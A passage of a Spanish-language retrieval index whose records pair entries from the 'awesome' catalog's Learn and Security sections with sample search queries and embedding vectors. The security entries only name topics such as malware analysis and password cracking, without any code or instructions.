-0.02383, -0.01056, 0.01975, -0.10847, -0.06767, 0.03409, 0.02628, -0.02108, 0.09841, -0.08143, -0.05057, -0.0236, 0.07855, 0.03506, -0.02418, 0.00107, -0.10842, 0.04375, 0.00301, 0.0148, 0.02406, 0.08441, 0.02572, -0.04185, 0.05132, 0.04578, -0.13435, -0.07264, -0.10938, -0.05092, -0.029, -0.12302, 0.07111, -0.18273, -0.10771, -0.17552, -0.01012, 0.10154, -0.06495, -0.03872, 0.02407, 0.12967, 0.01364, -0.05067, -0.14585, 0.07613, -0.04248, 0.08627, 0.03573, -0.07582, 0.05815, 0.04502, 0.11673, -0.08452, 0.0505, -0.02329, -0.05399, 0.02914, 0.06051, 0.02311, -0.04569, 0.0057, 0.10416, 0.01333, -0.01877, -0.12116, -0.07163, 0.04569, 0.00862, -0.05941, -0.05225, -0.00209, 0.079, 0.13182, 0.05943, 0.09807, -0.01751, -0.0928, -0.10236, 0.06407, 0.1199, 0.09967, 0.02555, -0.01711, -0.09861, 0.05408, 0.04202, -0.03621, 0.01422, -0.05528, -0.05693, 0.07173, 0.00217, -0.03231, 0.0142, -0.08981, -0.09071, 0.0766, -0.03966, 0.00489, 0.03172, 0.04542, -0.02498, 0.04501, 0.06335, 0.01719, 0.00483, -0.06876, -0.04167, -0.0656, -0.00161, -0.01209, -0.00205, -0.03156, -0.01677, -0.0079, 0.05505, 0.05963, 0.04668, -0.00639, -0.00615, 0.00939, 0.08783, -0.0256, -0.04441, 0.0451, 0.03772, 0.00444, 0.05768, 0.11427, -0.11582, 0.03626, 0.05527, 0.06491, -0.08975, -0.02572, -0.08214, -0.01084, -0.0177, -0.02079, -0.03734, -0.10123, -0.06852, -0.02295, 0.01963, 0.04414, -0.00231, 0.06972, 0.09793, 0.01195, -0.01843, -0.03869, -0.01505, -0.0159, -0.05578, -0.06938, -0.00534, 0.01321, -0.07517, -0.00303, -0.04265, -0.0007, 0.00307, -0.02905, -0.0098, 0.01123, -0.0341, 0.05861, -0.0103, -0.00961, -0.00344, -0.03197, 0.0023, 0.03452, 0.04507, 0.00139, -0.03832, 0.00558, 0.01036, -0.02549, 0.03172, 0.10721, -0.0769, 0.04479, 0.02338, 0.03741, 0.04967, -0.05443, 0.033, 0.03325, -0.01913, -0.00975, -0.00556, -0.00151, 0.001, 0.00065, 0.01153, -0.01004, 0.05152, 0.01053, 0.01253, -0.00545, 0.02315, 0.09847, 0.01265, -0.00228, -0.01937, -0.04893, -0.02565, -0.01264, -0.00261, -0.04294, -0.00213, -0.05768, -0.02133, -0.03979, 0.00883, 0.10696, -0.03941, -0.04529, 0.02439, -0.11077, -0.04904, 0.03428, -0.04796, -0.04138, -0.02268, 0.00978, 0.0487, 0.00257, -0.02111, -0.05003]} -{"tipo": "pregunta", "herramienta": "Learn", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Learn", "tema": "learn", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Learn: CLI Workshoppers β€” Interactive tutorials. Learn to Program. Speaking. Tech Videos. Computer History. Programming for Kids. STEAM β€” Supplements for specific science, technology, engineering, arts, and math (STEAM) courses across all grade levels. Educational Games β€” Learn while playing. JavaScript Learning. CSS Learning β€” Mainly about CSS – the language and the modules. Product Management β€” Learn how to be a better product manager. Roadmaps β€” Gives you a clear route to improve your knowledge and skills. YouTubers β€” Watch video tutorials from YouTubers that teach you about technology. Hackathon β€” Running fun and productive hackathons. Certificates β€” Free computer science certifications to showcase your knowledge.", "indexar": "con que puedo aprender CSS y JavaScript jugando o viendo tutoriales en vΓ­deo?", "v": [0.13667, 0.1278, -0.057, -0.10843, -0.06163, -0.16055, -0.04201, 0.01922, 0.22748, -0.12073, -0.04351, -0.08454, -0.09686, -0.02953, -0.01353, 0.0357, 0.19937, -0.00718, 0.09959, -0.02393, 0.03902, -0.11923, -0.14002, -0.07869, 0.0898, -0.04371, -0.04687, 0.0021, -0.08556, 0.01537, -0.08758, 0.09777, 0.06467, 0.00714, -0.0975, -0.03062, -0.01694, 0.01482, -0.0813, 0.0585, -0.03784, 0.11437, -0.09763, -0.03167, -0.04272, 0.01938, 0.09028, -0.09994, -0.10681, -0.0244, 0.11477, 0.06192, -0.06523, -0.06444, -0.00226, -0.01692, 0.11231, -0.18617, -0.06123, -0.10557, 0.05177, 0.00717, -0.00996, 0.04467, -0.00292, -0.01633, 0.00275, 0.08202, -0.02732, 0.06153, -0.07633, 0.05342, -0.07915, -0.0378, -0.04102, 0.00449, -0.05166, -0.0157, 0.06301, 0.03387, -0.10825, -0.06589, -0.05048, -0.01173, -0.03968, 0.07996, -0.03063, -0.03624, -0.01407, -0.16723, 0.02622, 0.10712, -0.05473, -0.08582, -0.03625, -0.02315, 0.05614, -0.00985, 0.07795, -0.09597, -0.03511, -0.01242, -0.08495, 0.01643, 0.09668, 0.13684, 0.06135, -0.07249, -0.09034, -0.01088, 0.0744, 0.08751, -0.12786, 0.01715, 0.01022, 0.01459, -0.04883, -0.00043, 0.01453, -0.01008, -0.01626, 0.0164, -0.02051, -0.08112, 0.01145, 0.06673, -0.07735, 0.09734, -0.0308, 0.0513, -0.04375, 0.00031, -0.05185, 0.03031, 0.03534, 0.06468, 0.1362, 0.04127, -0.10608, 0.04582, 0.01001, 0.02795, 0.06637, -0.01119, 0.03294, 0.01765, 0.12646, -0.01861, -0.0779, -0.03655, -0.00504, -0.02996, 0.0063, -0.0068, 0.02524, -0.02668, 0.04301, -0.04263, -0.0576, 0.029, 0.02243, 0.09163, 0.03725, -0.06097, -0.02264, -0.00224, -0.05706, 0.05453, -0.00565, -0.01282, 0.00702, 0.0336, -0.0261, -0.06612, -0.0213, -0.04077, -0.04595, -0.04328, -0.07473, -0.0156, 0.01435, -0.02156, -0.04421, 0.08381, -0.025, -0.04621, 0.00598, 0.006, 0.00437, 0.04101, -0.05473, 0.0111, -0.10219, -0.00244, 0.03161, -0.03746, 0.01797, -0.04651, -0.04956, 0.02537, -0.00883, 0.03359, 0.02899, -0.03476, -0.00702, -0.01275, -0.00125, 0.01242, -0.02776, -0.03211, 0.05224, -0.0119, 0.00402, -0.04292, 0.07196, -0.01069, 0.015, 0.08375, -0.06047, 0.02541, 0.04863, 0.05172, 0.05845, -0.04774, 0.02751, 0.02806, 0.01803, 0.08886, -0.03733, 0.04645, -0.06554, -0.06059, -0.01998, -0.03037, 0.06345, 0.03691, 0.02951, 0.02374, -0.10638, 0.00301, 0.02803, -0.00475, -0.01712, -0.00563, -0.04679, -0.11317, -0.05994, -0.02163, 0.03689, -0.04291, -0.02348, -0.0528, 0.00592, -0.03202, -0.06294, 0.02824]} -{"tipo": "pregunta", "herramienta": "Learn", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Learn", "tema": "learn", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Learn: CLI Workshoppers β€” Interactive tutorials. Learn to Program. Speaking. Tech Videos. Computer History. Programming for Kids. STEAM β€” Supplements for specific science, technology, engineering, arts, and math (STEAM) courses across all grade levels. Educational Games β€” Learn while playing. JavaScript Learning. CSS Learning β€” Mainly about CSS – the language and the modules. Product Management β€” Learn how to be a better product manager. Roadmaps β€” Gives you a clear route to improve your knowledge and skills. YouTubers β€” Watch video tutorials from YouTubers that teach you about technology. Hackathon β€” Running fun and productive hackathons. Certificates β€” Free computer science certifications to showcase your knowledge.", "indexar": "cual es una herramienta para preparar un plan de estudio claro si quiero especializarme en gestiΓ³n de productos?", "v": [-0.09128, 0.03515, -0.14939, -0.19994, 0.05013, -0.17015, -0.05216, -0.04044, -0.19389, -0.18291, -0.06547, -0.0407, -0.02095, -0.10762, -0.02236, 0.06277, 0.12182, -0.05293, 0.03561, 0.09024, -0.05037, -0.03809, -0.18509, -0.03037, -0.1908, -0.04498, 0.10083, -0.02844, -0.21096, 0.1471, -0.04614, 0.0621, 0.01331, -0.12021, -0.00012, -0.04452, 0.01169, 0.05713, -0.10879, 0.12195, -0.06845, -0.06976, 0.00853, 0.05506, 0.1028, 0.0619, 0.05355, 0.06106, 0.04233, 0.0738, -0.03639, -0.02756, -0.02876, 0.01191, 0.05579, -0.08955, 0.07093, -0.10908, 0.04951, -0.05118, -0.03429, -0.05781, 0.09484, -0.00497, 0.03447, 0.04148, -0.06777, 0.01405, -0.00582, 0.07338, -0.02111, -0.017, 0.07023, -0.03713, 0.01957, -0.05134, 0.05494, 0.15668, 0.03181, -0.03764, 0.03695, 0.05448, -0.06083, 0.00416, -0.061, -0.10049, 0.01977, 0.0811, 0.02609, -0.04067, -0.11483, -0.03827, -0.05865, -0.04536, 0.05285, -0.04986, 0.1342, -0.04492, -0.03433, 0.03797, 0.15684, -0.05062, -0.09499, 0.09837, -0.07857, 0.11747, -0.07133, 0.03414, -0.15361, 0.11477, -0.10295, 0.05385, 0.02322, -0.04007, -0.02147, 0.04476, 0.04071, 0.01134, -0.02023, -0.0868, -0.01077, 0.01828, -0.0344, -0.03573, 0.03685, 0.02527, 0.02892, 0.08597, -0.05412, -0.00127, 0.0201, 0.00164, -0.0154, -0.04714, -0.01877, -0.053, -0.02275, -0.05827, -0.0259, -0.06142, -0.06507, 0.06073, -0.03146, -0.00652, 0.05132, -0.00159, 0.01402, 0.01545, 0.00085, 0.07356, -0.01955, -0.05184, 0.03248, -0.02801, -0.05306, 0.00076, -0.03126, 0.01291, -0.04819, 0.04729, -0.04646, -0.00907, -0.011, -0.00104, 0.03568, -0.03752, 0.00463, 0.01223, 0.0291, 0.04354, 0.03916, -0.06008, 0.0468, -0.05043, 0.01026, -0.10107, -0.06306, -0.0488, -0.0055, -0.06854, -0.00392, 0.01325, 0.01149, 0.04058, 0.05145, -0.02433, 0.03918, -0.02156, -0.00437, 0.04664, -0.00486, -0.00341, 0.05228, -0.08319, 0.04095, 0.00875, -0.01374, -0.01964, 0.02814, -0.04129, -0.04253, -0.05642, 0.03185, -0.06242, 0.01362, 0.00373, -0.05964, -0.02525, -0.0201, 0.02727, 0.01423, -0.02805, 0.02898, -0.02422, -0.00883, -0.02117, -0.01508, 0.04169, 0.05609, 0.02268, 0.01571, 0.02955, -0.00136, 0.0583, -0.04932, 0.04562, 0.00976, -0.01312, -0.02868, -0.02069, 0.00288, -0.0581, 0.01026, 0.00856, 0.00131, -0.04395, 0.03663, -0.04457, -0.03371, -0.00663, 0.02137, 0.10166, 0.00624, -0.01488, -0.0642, -0.02483, -0.03565, 0.00342, -0.07063, -0.07066, 0.01857, -0.03636, 0.04448, -0.03016, 0.04271, -0.04686]} -{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Application Security. Security. CTF β€” Capture The Flag. Cyber Security University β€” Free educational resources that focus on learning by doing. Malware Analysis. Android Security. Hacking. Hacking Spots. Honeypots β€” Deception trap, designed to entice an attacker into attempting to compromise the information systems in an organization. Incident Response. Vehicle Security and Car Hacking. Web Security β€” Security of web apps & services. Lockpicking β€” The art of unlocking a lock by manipulating its components without the key. Cybersecurity Blue Team β€” Groups of individuals who identify security flaws in information technology systems. Fuzzing β€” Automated software testing technique that involves feeding pseudo-randomly generated input data. Embedded and IoT Security. GDPR β€” Regulation on data protection and privacy for all individuals within EU. DevSecOps β€” Integration of security practices into [DevOps](https://en.wikipedia.org/wiki/DevOps). Executable Packing β€” Packing and unpacking executable formats.", "indexar": "que herramientas sirven para hacer anΓ‘lisis de malware y pruebas de penetraciΓ³n", "v": [0.06874, 0.06203, -0.1368, -0.24553, -0.06759, 0.01295, -0.03203, 0.05326, -0.01103, -0.00718, 0.00258, 0.02792, 0.03329, -0.09238, 0.02886, 0.10854, 0.00301, -0.09569, 0.00704, -0.01126, -0.04075, -0.08321, -0.12817, -0.03698, -0.12036, 0.15603, -0.05599, 0.02904, -0.09532, -0.04034, -0.05635, -0.00375, 0.06287, -0.06351, -0.07971, -0.02532, -0.0533, -0.00365, 0.10672, 0.22098, 0.0543, -0.06804, -0.08433, -0.0142, 0.07776, -0.03818, -0.04263, 0.01286, 0.00383, 0.06913, 0.00224, -0.06192, -0.06321, -0.00416, -0.03456, -0.17209, 0.02293, -0.11729, 0.0619, -0.09638, -0.08317, 0.05264, -0.01155, 0.05044, -0.02558, -0.04624, 0.03449, 0.05756, -0.06302, 0.12236, 0.01445, 0.08826, -0.03807, -0.08077, -0.17334, -0.08218, -0.0331, 0.11937, 0.04143, -0.04736, 0.06263, 0.06839, -0.01461, -0.00542, -0.15995, -0.03195, 0.00985, -0.057, 0.0598, -0.1504, 0.05393, 0.08747, -0.00455, 0.1235, 0.04148, 0.00755, 0.1367, -0.03849, 0.04168, 0.0281, 0.11226, -0.06014, -0.05095, 0.13252, -0.05807, 0.04213, -0.06829, 0.00121, -0.02413, -0.04187, -0.0109, 0.02404, -0.04333, -0.07437, -0.0328, -0.06445, -0.04303, -0.08155, -0.0341, -0.1149, -0.01979, -0.01575, -0.13882, 0.06062, -0.12124, -0.06868, 0.02506, 0.00872, 0.01033, -0.07488, 0.11809, -0.00979, -0.11388, 0.03703, -0.03878, -0.00591, 0.00862, -0.09227, -0.07682, -0.03174, 0.05031, 0.135, 0.01106, 0.01129, 0.00368, 0.06192, -0.04399, -0.05579, -0.04937, 0.00199, -0.02632, 0.0088, -0.05677, 0.11001, -0.01079, -0.0303, -0.05371, -0.00464, -0.02163, 0.07175, -0.01219, -0.00559, 0.04708, 0.00735, 0.00591, 0.05668, 0.03503, -0.01918, 0.02781, 0.01391, -0.04186, 0.07032, 0.04817, -0.08924, 0.04386, -0.03942, 0.04936, -0.05215, -0.04994, -0.06648, 0.01914, -0.01612, 0.00092, -0.04235, 0.03071, -0.00139, 0.05389, -0.01404, 0.04983, 0.05152, -0.00807, 0.0243, -0.06141, 0.00376, 0.07064, -0.00732, -0.02428, 0.01101, -0.0227, -0.02714, -0.03557, -0.05089, -0.01417, -0.04438, -0.02952, 0.07954, -0.01374, -0.04982, -0.04656, 0.03791, 0.04773, 0.02154, 0.03297, -0.09514, -0.05791, -0.02866, -0.00185, 0.06779, -0.05043, 0.03746, -0.00726, 0.02612, 0.06013, -0.0247, -0.05657, 0.03235, -0.04975, -0.02765, 0.0677, -0.0188, 0.02618, 0.00954, -0.03078, -0.02367, 0.00919, -0.04534, -0.03112, -0.04413, -0.01373, -0.03134, -0.03455, 0.02972, -0.00158, -0.03484, -0.0324, -0.03774, 0.00627, -0.04407, -0.02307, -0.02683, -0.04064, -0.00903, -0.00301, -0.04756, 0.04544, -0.0381]} -{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Application Security. Security. CTF β€” Capture The Flag. Cyber Security University β€” Free educational resources that focus on learning by doing. Malware Analysis. Android Security. Hacking. Hacking Spots. Honeypots β€” Deception trap, designed to entice an attacker into attempting to compromise the information systems in an organization. Incident Response. Vehicle Security and Car Hacking. Web Security β€” Security of web apps & services. Lockpicking β€” The art of unlocking a lock by manipulating its components without the key. Cybersecurity Blue Team β€” Groups of individuals who identify security flaws in information technology systems. Fuzzing β€” Automated software testing technique that involves feeding pseudo-randomly generated input data. Embedded and IoT Security. GDPR β€” Regulation on data protection and privacy for all individuals within EU. DevSecOps β€” Integration of security practices into [DevOps](https://en.wikipedia.org/wiki/DevOps). Executable Packing β€” Packing and unpacking executable formats.", "indexar": "cual es una alternativa libre a las plataformas educativas de seguridad informΓ‘tica", "v": [0.09812, 0.03663, -0.06176, -0.18526, 0.01708, -0.17586, -0.00815, -0.10608, -0.16572, -0.08495, 0.0083, -0.09924, -0.02271, 0.02054, 0.06953, -0.03538, 0.12356, -0.07797, 0.10854, -0.06656, -0.03636, 0.02226, -0.12555, -0.05668, -0.03383, -0.01278, -0.12941, 0.02775, -0.03724, 0.01515, -0.01452, 0.0638, 0.06923, -0.03905, -0.11395, 0.00848, 0.12278, 0.04173, 0.02044, -0.04021, 0.02021, 0.03931, -0.02886, -0.01308, 0.1535, -0.0288, 0.04834, 0.02088, 0.06763, -0.01723, -0.04412, -0.04701, -0.02736, -0.10386, 0.08016, -0.00471, 0.12866, -0.03028, 0.01336, 0.00322, -0.18325, 0.05697, 0.08231, 0.02249, 0.05324, 0.07957, 0.05782, -0.02546, -0.12393, 0.15122, 0.15121, 0.00177, 0.02759, -0.01544, -0.06416, 0.0084, -0.0711, -0.04751, 0.04486, 0.05346, -0.00484, 0.04239, -0.04451, 0.0766, -0.09757, -0.10349, 0.00237, -0.038, 0.00981, 0.0173, 0.07493, 0.13912, -0.05616, 0.04964, 0.04767, -0.05451, 0.09833, 0.04845, -0.10347, 0.02765, -0.04828, -0.02068, -0.09977, -0.00943, -0.06961, 0.02297, -0.04425, 0.0023, -0.01503, -0.02426, 0.05683, 0.06872, 0.03379, -0.0041, 0.01138, 0.02787, -0.00601, -0.03839, 0.04869, -0.00413, 0.00312, 0.00172, 0.03329, -0.04217, 0.14121, 0.11991, 0.03667, 0.02714, -0.04371, -0.00167, 0.03985, -0.16729, -0.04611, -0.05143, -0.04363, -0.0415, 0.01976, -0.14892, -0.00432, -0.03866, 0.09877, 0.08739, 0.02886, -0.02857, 0.02525, 0.05174, 0.09056, -0.0451, -0.03061, -0.03505, -0.08889, 0.0373, -0.04428, 0.08655, -0.07476, 0.08535, -0.08603, -0.02158, -0.08145, 0.09654, 0.04697, 0.02847, 0.03346, 0.00338, -0.03326, -0.03835, 0.00041, -0.00064, -0.02393, -0.00357, -0.04289, 0.08801, 0.12378, -0.06154, 0.00192, -0.0548, -0.03946, -0.02573, -0.0378, -0.05963, -0.00253, -0.03122, -0.0607, 0.0168, -0.00763, -0.08651, -0.03628, -0.00776, -0.0076, 0.04421, -0.04685, 0.0124, -0.13859, -0.04063, -0.02483, -0.02969, -0.02956, -0.08428, -0.01113, -0.02341, -0.08448, 0.0376, -0.05113, -0.07149, -0.0061, 0.03008, 0.0157, 0.00642, -0.01487, 0.03954, 0.0118, 0.01346, 0.02902, -0.04057, -0.06351, -0.06333, 0.05616, -0.0198, -0.00032, 0.01143, 0.00667, 0.02177, -0.01398, 0.01059, -0.02202, 0.01883, 0.02532, 0.06322, -0.00613, -0.02634, 0.04745, -0.06702, -0.04216, 0.00038, -0.01392, -0.03629, 0.01253, 0.01201, -0.02894, 0.00366, 0.00777, 0.08451, -0.0315, -0.07954, -0.07438, -0.0206, -0.12324, -0.01096, -0.02788, -0.09786, -0.08728, 0.02449, 0.0245, 0.028, -0.04697, 0.01017]} -{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Application Security. Security. CTF β€” Capture The Flag. Cyber Security University β€” Free educational resources that focus on learning by doing. Malware Analysis. Android Security. Hacking. Hacking Spots. Honeypots β€” Deception trap, designed to entice an attacker into attempting to compromise the information systems in an organization. Incident Response. Vehicle Security and Car Hacking. Web Security β€” Security of web apps & services. Lockpicking β€” The art of unlocking a lock by manipulating its components without the key. Cybersecurity Blue Team β€” Groups of individuals who identify security flaws in information technology systems. Fuzzing β€” Automated software testing technique that involves feeding pseudo-randomly generated input data. Embedded and IoT Security. GDPR β€” Regulation on data protection and privacy for all individuals within EU. DevSecOps β€” Integration of security practices into [DevOps](https://en.wikipedia.org/wiki/DevOps). Executable Packing β€” Packing and unpacking executable formats.", "indexar": "quΓ© tΓ©cnicas automatizadas existen para probar la seguridad de aplicaciones web", "v": [-0.10966, 0.09124, -0.13034, -0.28003, 0.02798, -0.04315, -0.09934, -0.05323, -0.09551, 0.02825, -0.0932, -0.10842, -0.02596, 0.05187, 0.07756, -0.00786, 0.04976, -0.16676, 0.08633, 0.03585, 0.01807, -0.02808, -0.18623, -0.09476, -0.06383, 0.00654, 0.0559, -0.05708, -0.15966, -0.01995, -0.0509, 0.02392, 0.11682, 0.04481, -0.15763, -0.02533, 0.05478, -0.0378, 0.02238, 0.06001, -0.02178, -0.07291, -0.0503, -0.01642, 0.16631, 0.06276, 0.01142, -0.02222, -0.02506, -0.03015, -0.02327, -0.03687, -0.01747, -0.05612, 0.00518, -0.1244, 0.12178, -0.08859, 0.12437, -0.03621, -0.08899, 0.01587, 0.02644, 0.13944, 0.01774, -0.05547, 0.06771, 0.05481, -0.09219, 0.07297, 0.06486, 0.04066, 0.00564, 0.06759, 0.06481, -0.01295, -0.06888, 0.05987, 0.03066, -0.01099, -0.06086, 0.05493, -0.1058, 0.02776, -0.06895, -0.12856, 0.00802, 0.005, -0.02783, -0.05115, 0.11438, 0.03169, 0.04471, 0.00787, 0.05461, -0.05155, 0.12898, -0.06863, 0.00989, 0.05571, -0.00462, -0.08047, -0.06951, 0.00023, -0.05286, 0.01904, 0.04132, -0.01387, 0.0138, -0.14904, -0.11709, -0.02945, -0.06, 0.02579, -0.05367, -0.01699, 0.03789, -0.11239, 0.0187, -0.05979, -0.05463, 0.01556, -0.00734, -0.00265, 0.07917, 0.0139, 0.02181, 0.11717, -0.03874, -0.02638, 0.065, -0.08272, -0.15252, -0.03515, -0.03052, 0.07469, 0.0484, -0.08961, -0.04753, -0.06128, 0.02965, 0.06091, -0.03789, -0.02051, 0.0519, 0.03735, 0.0109, 0.00257, -0.06556, 0.03976, -0.01575, -0.07805, -0.03559, 0.03149, -0.071, 0.01215, -0.06764, -0.11269, 0.00268, 0.06111, -0.01339, 0.04659, -0.029, -0.01011, -0.04448, -0.00389, 0.01168, -0.01368, 0.03716, 0.02248, 0.02321, 0.11675, 0.04973, -0.06362, 0.0197, -0.00289, -0.02794, -0.05048, -0.01926, -0.08705, -0.04167, -0.06527, 0.01821, -0.00673, 0.07285, -0.06071, 0.02038, 0.01235, 0.02569, 0.08608, -0.04787, 0.02801, -0.11545, 0.02889, 0.00951, -0.00533, 0.02136, -0.08003, -0.04206, 0.00736, -0.04758, -0.02584, -0.01564, -0.05032, 0.00273, 0.06242, 0.04006, -0.01124, -0.05155, -0.01999, 0.03016, -0.00108, 0.04862, -0.01742, -0.00752, -0.05907, 0.01693, 0.02152, -0.07616, -0.00365, 0.01543, -0.05099, -0.00924, 0.02784, -0.021, 0.00288, 0.01372, 0.03538, 0.01469, -0.03341, 0.0021, 0.0027, -0.061, 0.003, 0.02072, 0.00029, 0.01533, -0.02192, -0.05367, -0.07776, -0.0427, 0.09254, 0.00984, -0.06404, -0.06125, -0.06408, -0.08396, -0.0019, -0.0153, -0.02975, -0.01591, 0.03362, 0.0206, 0.00193, -0.00532, -0.01871]} -{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Malware Persistence β€” Techniques that adversaries use to keep access to systems across restarts. EVM Security β€” Understanding the Ethereum Virtual Machine security ecosystem. Password Cracking β€” The process of recovering passwords from data that has been stored in or transmitted by a system in scrambled form. Security Card Games β€” Train your skills and discuss various security topics. Suricata β€” Intrusion detection/prevention system and network security monitoring engine. Prompt Injection β€” A type of vulnerability that specifically targets machine learning models. Detection Engineering β€” Design, build, and operate detective cybersecurity controls. Annual Security Reports β€” Exploring cybersecurity trends, insights, and challenges. CI/CD Attacks β€” Offensive research of systems and processes related to developing and deploying code. OpenID Connect β€” Identity standard and authentication protocol built on OAuth 2.0 for user identity assertion.", "indexar": "que tΓ©cnica se usa para mantener el acceso a sistemas tras un reinicio?", "v": [-0.08683, 0.07497, -0.18647, -0.11582, 0.14352, -0.08926, -0.13869, -0.1698, -0.04096, 0.05623, -0.23246, -0.05652, 0.01249, 0.02284, 0.1498, 0.01797, 0.05495, -0.05088, 0.1231, -0.07016, -0.08841, -0.02643, -0.02547, 0.00203, -0.02749, -0.02105, 0.08302, -0.15224, -0.12827, -0.02558, 0.00625, -0.00611, 0.09452, -0.07352, -0.12978, -0.09536, 0.00129, 0.08473, 0.05734, 0.04383, -0.03857, -0.07328, -0.07656, 0.02751, 0.19597, -0.04943, 0.09561, 0.04884, 0.01977, -0.01779, -0.04205, 0.05887, -0.05119, -0.09677, -0.02351, -0.07164, 0.08885, -0.02635, -0.02912, -0.05931, -0.01962, 0.02216, 0.05098, 0.02506, 0.02272, -0.06472, -0.06717, -0.10223, -0.0083, 0.08112, 0.03066, 0.00287, -0.00787, -0.02242, -0.07695, 0.12531, -0.00903, 0.05279, 0.05264, -0.03803, -0.15758, -0.03798, -0.06034, 0.05905, -0.09577, -0.09827, 0.03821, 0.03828, -0.03263, -0.11204, 0.07668, -0.04445, 0.04926, -0.00538, 0.10905, 0.04811, -0.13317, 0.08781, -0.09133, -0.01165, 0.01592, -0.04627, -0.00637, 0.01528, -0.04999, 0.01745, 0.08174, -0.04736, 0.023, -0.06063, -0.07916, 0.04076, -0.03096, -0.03368, -0.12038, 0.03297, 0.01548, -0.02527, -0.10458, 0.03266, -0.07538, 0.03593, 0.08966, 0.00368, 0.03839, -0.06872, -0.02529, -0.02823, 0.00234, 0.01148, 0.01011, -0.00324, -0.08733, 0.0484, 0.0147, 0.04039, 0.04554, 0.01461, -0.02074, -0.0237, -0.01386, 0.09168, -0.0419, -0.02401, 0.01377, 0.01575, 0.05582, -0.12726, -0.06355, -0.07554, -0.04327, 0.04154, -0.03628, 0.032, -0.00796, 0.02069, 0.01342, -0.08386, 0.02292, 0.06056, -0.01809, 0.05296, 0.00271, -0.04286, -0.03032, 0.02182, -0.06875, -0.07366, 0.02362, -0.00912, -0.01291, 0.08497, -0.02311, -0.04303, -0.00569, -0.00969, -0.05224, -0.1013, 0.02112, -0.03252, -0.1124, -0.01358, 0.00966, -0.02054, -0.02557, 0.01202, -0.08488, -0.02548, -0.0084, 0.06798, -0.01322, 0.04112, -0.04707, 0.02541, 0.00682, -0.06544, -0.09932, -0.02671, -0.04877, 0.08237, -0.09954, 0.0372, -0.011, -0.03282, 0.01727, 0.00124, -0.01593, -0.05915, -0.06898, 0.00891, 0.00162, -0.03149, 0.03072, -0.01875, -0.0395, -0.02226, -0.02486, 0.01831, -0.0629, -0.04791, 0.04633, 0.02861, -0.00026, 0.04021, 0.03665, -0.08211, -0.00765, 0.05163, -0.01307, -0.03843, -0.0393, -0.01488, 0.02257, -0.03198, 0.08252, 0.00642, -0.02168, -0.0405, -0.00521, -0.05338, 0.05596, 0.09915, -0.04346, -0.02434, 0.00586, -0.02246, -0.10067, -0.00169, -0.0177, -0.03645, 0.01649, -0.00667, -0.00782, -0.04054, 0.02447, -0.06638]} -{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Malware Persistence β€” Techniques that adversaries use to keep access to systems across restarts. EVM Security β€” Understanding the Ethereum Virtual Machine security ecosystem. Password Cracking β€” The process of recovering passwords from data that has been stored in or transmitted by a system in scrambled form. Security Card Games β€” Train your skills and discuss various security topics. Suricata β€” Intrusion detection/prevention system and network security monitoring engine. Prompt Injection β€” A type of vulnerability that specifically targets machine learning models. Detection Engineering β€” Design, build, and operate detective cybersecurity controls. Annual Security Reports β€” Exploring cybersecurity trends, insights, and challenges. CI/CD Attacks β€” Offensive research of systems and processes related to developing and deploying code. OpenID Connect β€” Identity standard and authentication protocol built on OAuth 2.0 for user identity assertion.", "indexar": "cual es una alternativa libre a las herramientas de cruce de contraseΓ±as?", "v": [0.09313, -0.01494, -0.13121, -0.06265, -0.09583, -0.15359, -0.03639, -0.01688, -0.09052, -0.06882, -0.05706, -0.09218, -0.09941, 0.02037, 0.13896, -0.07961, 0.0679, 0.02086, 0.11129, 0.06569, -0.09854, -0.12452, -0.09811, -0.0145, -0.10109, -0.15425, -0.06157, -0.02241, -0.11389, 0.00435, -0.01353, 0.0617, 0.0619, 0.06345, 0.05448, -0.00919, 0.03153, 0.12638, 0.09186, 0.03152, 0.06461, -0.04252, -0.0585, 0.11192, -0.03688, -0.16338, 0.00024, 0.06212, 0.02505, 0.04781, -0.04434, -0.12401, -0.14178, -0.10037, 0.02388, -0.02296, 0.20216, -0.00047, -0.01022, -0.06291, -0.08635, 0.0499, -0.01671, 0.03107, -0.05365, -0.03548, -0.03879, -0.05243, -0.14962, 0.15109, 0.0859, -0.04456, -0.0489, -0.01533, -0.07622, 0.01934, -0.00877, 0.08042, 0.01025, 0.01787, 0.04908, -0.05241, 0.04093, -0.00025, -0.08435, -0.05636, 0.0616, -0.00276, 0.0513, -0.01032, 0.14311, 0.05579, 0.02953, 0.10953, 0.02949, -0.06045, -0.05149, 0.02627, -0.03719, 0.01523, 0.07361, 0.04276, -0.06802, 0.06519, -0.02345, 0.00981, -0.03052, 0.05117, -0.01759, -0.06484, 0.05454, 0.08, 0.05967, -0.03772, 0.01368, -0.00062, -0.03657, -0.05178, 0.03229, -0.03117, 0.0315, -0.00532, -0.05128, 0.03269, 0.03264, 0.04639, 0.0434, 0.03704, -0.05681, -0.0976, 0.03831, -0.02589, -0.06502, -0.10341, -0.09609, -0.00215, 0.04216, -0.1615, -0.07809, -0.06792, 0.02467, 0.01559, 0.00041, -0.06167, 0.0827, 0.02589, 0.00326, -0.07968, -0.02624, -0.00486, -0.07387, 0.02345, -0.00077, 0.10435, 0.00178, 0.01483, -0.09572, -0.03105, 